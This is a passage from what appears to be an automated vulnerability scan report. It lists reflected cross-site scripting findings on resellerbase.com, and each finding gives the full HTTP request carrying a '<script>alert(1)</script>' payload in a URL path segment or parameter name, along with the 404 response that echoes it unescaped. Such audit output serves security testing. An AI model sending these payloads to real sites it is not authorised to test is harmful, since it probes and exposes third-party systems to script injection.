Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/?7c0d6<script>alert(1)</script>91f8c26408f=1 was not found on this server.</p>
...[SNIP]...

2.483. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33e5b<script>alert(1)</script>e45b54c6288 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication33e5b<script>alert(1)</script>e45b54c6288/broadband/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication33e5b<script>alert(1)</script>e45b54c6288/broadband/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.484. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7663d<script>alert(1)</script>a11f598e84a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband7663d<script>alert(1)</script>a11f598e84a/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband7663d<script>alert(1)</script>a11f598e84a/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.485. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 95d08<script>alert(1)</script>15072d99a79 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes95d08<script>alert(1)</script>15072d99a79/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes95d08<script>alert(1)</script>15072d99a79/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.486. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f0836<script>alert(1)</script>2fb880d8bc4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmosf0836<script>alert(1)</script>2fb880d8bc4/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmosf0836<script>alert(1)</script>2fb880d8bc4/images/ was not found on this server.</p>
...[SNIP]...

2.487. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload adb6e<script>alert(1)</script>cad1a47052b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/imagesadb6e<script>alert(1)</script>cad1a47052b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/imagesadb6e<script>alert(1)</script>cad1a47052b/ was not found on this server.</p>
...[SNIP]...

2.488. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f70c6<script>alert(1)</script>ea66fc372bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/?f70c6<script>alert(1)</script>ea66fc372bb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/?f70c6<script>alert(1)</script>ea66fc372bb=1 was not found on this server.</p>
...[SNIP]...

2.489. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 429c7<script>alert(1)</script>4816cfd906 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication429c7<script>alert(1)</script>4816cfd906/broadband/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication429c7<script>alert(1)</script>4816cfd906/broadband/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.490. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 605a6<script>alert(1)</script>135ebc958b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband605a6<script>alert(1)</script>135ebc958b8/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband605a6<script>alert(1)</script>135ebc958b8/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.491. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 698dd<script>alert(1)</script>010364314e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes698dd<script>alert(1)</script>010364314e5/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes698dd<script>alert(1)</script>010364314e5/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.492. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 403a9<script>alert(1)</script>579478cc971 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos403a9<script>alert(1)</script>579478cc971/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos403a9<script>alert(1)</script>579478cc971/images/rating/ was not found on this server.</p>
...[SNIP]...

2.493. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e84fd<script>alert(1)</script>15b86b49b51 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/imagese84fd<script>alert(1)</script>15b86b49b51/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/imagese84fd<script>alert(1)</script>15b86b49b51/rating/ was not found on this server.</p>
...[SNIP]...

2.494. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f9c0d<script>alert(1)</script>31a4a5a963 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/ratingf9c0d<script>alert(1)</script>31a4a5a963/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/ratingf9c0d<script>alert(1)</script>31a4a5a963/ was not found on this server.</p>
...[SNIP]...

2.495. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 47c76<script>alert(1)</script>5f97f0310a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating/?47c76<script>alert(1)</script>5f97f0310a2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/?47c76<script>alert(1)</script>5f97f0310a2=1 was not found on this server.</p>
...[SNIP]...

2.496. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/2half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 522db<script>alert(1)</script>e8f1e1ae6f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication522db<script>alert(1)</script>e8f1e1ae6f2/broadband/themes/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication522db<script>alert(1)</script>e8f1e1ae6f2/broadband/themes/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.497. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/2half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3e65e<script>alert(1)</script>151fc6cd0be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband3e65e<script>alert(1)</script>151fc6cd0be/themes/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband3e65e<script>alert(1)</script>151fc6cd0be/themes/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.498. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/2half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 44cab<script>alert(1)</script>340f6062b92 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes44cab<script>alert(1)</script>340f6062b92/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes44cab<script>alert(1)</script>340f6062b92/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.499. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/2half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f753c<script>alert(1)</script>d4c623fe04a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmosf753c<script>alert(1)</script>d4c623fe04a/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmosf753c<script>alert(1)</script>d4c623fe04a/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.500. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/2half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4b86c<script>alert(1)</script>78e5aec239f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images4b86c<script>alert(1)</script>78e5aec239f/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images4b86c<script>alert(1)</script>78e5aec239f/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.501. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/2half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7c63b<script>alert(1)</script>117e04ede1f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating7c63b<script>alert(1)</script>117e04ede1f/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating7c63b<script>alert(1)</script>117e04ede1f/2half.gif was not found on this server.</p>
...[SNIP]...

2.502. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/2half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/2half.gif

Issue detail

